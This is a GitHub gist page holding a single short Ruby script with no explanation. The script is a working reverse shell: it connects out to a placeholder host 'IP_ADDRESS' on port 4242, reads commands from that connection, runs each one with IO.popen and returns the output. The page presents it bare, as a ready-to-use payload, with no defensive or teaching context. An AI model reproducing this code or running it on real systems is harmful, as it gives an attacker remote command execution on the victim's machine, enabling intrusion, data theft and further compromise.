Skip to content

Instantly share code, notes, and snippets.

@FatihDurmus
Created March 17, 2021 23:17
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save FatihDurmus/2321ff90de22907a51f5ea53d09bc755 to your computer and use it in GitHub Desktop.
Save FatihDurmus/2321ff90de22907a51f5ea53d09bc755 to your computer and use it in GitHub Desktop.
c=TCPSocket.new("IP_ADDRESS","4242");
while (cmd=c.gets);
IO.popen(cmd,"r")
{
|io|c.print io.read
}
end
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment